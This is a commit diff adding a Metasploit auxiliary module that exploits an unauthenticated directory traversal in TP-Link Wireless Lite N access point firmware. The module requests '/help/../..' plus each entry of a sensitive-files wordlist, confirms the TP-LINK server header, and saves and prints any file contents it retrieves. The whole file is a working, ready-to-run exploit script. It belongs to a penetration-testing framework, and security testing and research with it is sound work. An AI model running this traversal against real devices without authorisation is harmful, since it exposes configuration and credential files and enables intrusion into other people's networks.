tplink traversal - initial commit

Author: m-1-k-3

modules/auxiliary/admin/http/tplink_traversal_noauth.rb

@@ -0,0 +1,138 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'TP-Link Wireless Lite N Access Point - Directory Traversal Vulnerability',
+			'Version'     => '$$',
+			'Description' => %q{
+				This module tests whether a directory traversal vulnerablity is present
+				in versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n
+				},
+			'References'  =>
+				[
+					[ 'URL', 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-011' ],
+					[ 'BID', '57969' ],
+					[ 'EDB', '24504' ]
+				],
+			'Author'      => [ 'm-1-k-3' ],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptPath.new('SENSITIVE_FILES',  [ true, "File containing senstive files, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
+			], self.class)
+	end
+
+	def extract_words(wordfile)
+		return [] unless wordfile && File.readable?(wordfile)
+		begin
+			words = File.open(wordfile, "rb") do |f|
+				f.read
+			end
+		rescue
+			return []
+		end
+		save_array = words.split(/\r?\n/)
+		return save_array
+	end
+
+	def find_files(file)
+		traversal = '/../..'
+
+		res = send_request_cgi(
+			{
+				'method'  => 'GET',
+				'uri'     => '/help' << traversal << file,
+				})
+
+		return if res.nil?
+		return if (res.headers['Server'].nil? or res.headers['Server'] !~ /TP-LINK Router/)
+		return if (res.code == 404)
+		return if (res.code == 501)
+
+		if (res and res.code == 200 and res.body !~ /\<\/HTML/)
+			out = false
+
+			print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
+			report_web_vuln({
+				:host     => rhost,
+				:port     => rport,
+				:vhost    => datastore['VHOST'],
+				:path     => "/",
+				:pname    => normalize_uri(traversal, file),
+				:risk     => 3,
+				:proof    => normalize_uri(traversal, file),
+				:name     => self.fullname,
+				:category => "web",
+				:method   => "GET"
+				})
+
+			loot = store_loot("lfi.data","text/plain",rhost, res.body,file)
+			vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
+
+			if datastore['VERBOSE'] == true
+				vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
+				res.body.each_line do |line|
+					#the following is the last line of the useless response
+					if line.to_s =~ /\/\/--><\/SCRIPT>/
+						#setting out = true to print all of the following stuff
+						out = true
+						next
+					end
+					if out == true
+						if line =~ /<META/ or line =~ /<Script/
+							#we are finished :)
+							#the next line is typical code from the website and nothing from us
+							#this means we can skip this stuff ...
+							out = false
+							next
+						else
+							#it is our output *h00ray*
+							#output our stuff ...
+							print_line("#{line}")
+						end
+					end
+				end
+				out = false
+			end
+		elsif (res and res.code)
+			vprint_error("#{rhost}:#{rport} - File->#{file} not found")
+		end
+	end
+
+	def run_host(ip)
+
+		begin
+			print_status("#{rhost}:#{rport} - connecting")
+			res = send_request_cgi(
+				{
+					'method'  => 'GET',
+					'uri'	 => '/',
+				})
+
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+
+		extract_words(datastore['SENSITIVE_FILES']).each do |files|
+			find_files(files) unless files.empty?
+		end
+
+	end
+end